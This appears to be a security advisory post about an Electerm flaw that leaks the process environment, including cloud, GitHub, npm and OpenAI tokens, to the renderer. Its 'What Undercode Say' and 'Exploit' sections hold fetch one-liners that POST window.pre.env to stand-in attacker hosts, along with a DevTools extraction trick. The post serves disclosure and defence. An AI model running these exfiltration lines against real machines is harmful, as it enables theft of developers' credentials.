Electerm, Information Disclosure, CVE-TBD (Critical)

By /

Listen to this Post

The vulnerability resides in the `getConstants()` IPC handler defined in src/app/lib/ipc-sync.js. This handler, exposed to the renderer process, serializes the entire `process.env` object without any filtering or sanitization. The serialized data is then sent to the renderer and stored as window.pre.env, making it accessible to any JavaScript code running in that context. On developer or CI/CD machines, `process.env` commonly contains highly sensitive secrets such as AWS_SECRET_ACCESS_KEY, AWS_SESSION_TOKEN, GITHUB_TOKEN, NPM_TOKEN, OPENAI_API_KEY, DOCKER_AUTH, database URLs, and internal service credentials. An attacker who achieves arbitrary JavaScript execution within the renderer (e.g., via a malicious plugin, an XSS flaw, or the terminal hyperlink execution chain) can trivially read `window.pre.env` and exfiltrate all secrets to a remote server. Even without code execution, simply opening the “Info” modal in the application exposes these secrets, though that requires local access. The exposure is silent, persistent, and leads directly to cloud account compromise, supply chain poisoning, and lateral movement. No authentication or privilege escalation is needed; any renderer‑side script can retrieve the environment dump. The flaw is a classic case of sensitive data being leaked through an overly broad IPC interface. Because the application is built on Electron, the renderer is inherently untrusted when third‑party plugins or external content are loaded.
Platform: Electerm
Version: All vulnerable
Vulnerability: Env variable leak
Severity: Critical
Date: 2026‑05‑08

Prediction: Patch in Q3 2026

What Undercode Say:

Check if window.pre.env is exposed (run in DevTools console)
console.log(window.pre.env);
Simulate exfiltration via fetch
fetch('https://attacker.com/steal', { method: 'POST', body: JSON.stringify(window.pre.env) });
Audit running Electerm processes for sensitive environment
ps e -p $(pgrep -f electerm) | grep -E 'AWS_|GITHUB_|OPENAI_|DOCKER_'

Exploit:

  1. Attacker gains JavaScript execution in the renderer (e.g., by tricking user to install a malicious plugin or clicking a crafted terminal hyperlink).
  2. Run: `fetch(‘https://evil.com/exfil’, {method:’POST’, body:JSON.stringify(window.pre.env)})`
    3. Alternatively, open DevTools (F12) and type `copy(window.pre.env)` to extract secrets manually.
  3. The stolen credentials allow direct access to cloud consoles, GitHub repos, npm publish rights, or OpenAI accounts.

Protection from this CVE

  • Avoid launching Electerm with any sensitive environment variables. Use `env -i` or a wrapper script that clears `process.env` before starting.
  • Disable remote debugging (--remote-debugging-port must not be used).
  • Never install plugins from untrusted sources; audit all installed plugins for network calls.
  • Block renderer network egress via a local firewall or Electron’s `session` API.
  • Monitor for unexpected `window.pre.env` access using a preload script that overrides getters.

Impact

Full compromise of any cloud, CI, or source‑code accounts whose tokens are present in process.env. Attackers can push malicious code to internal registries, exfiltrate proprietary source code, run costly LLM API calls, and pivot to internal networks. Supply‑chain attacks against downstream consumers of the compromised developer’s software become trivial.

🎯Let’s Practice Exploiting & Learn Patching For Free:

Sources:

Reported By: github.com
Extra Source Hub:
Undercode

🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]

💬 Whatsapp | 💬 Telegram

📢 Follow DailyCVE & Stay Tuned:

𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin Featured Image

Scroll to Top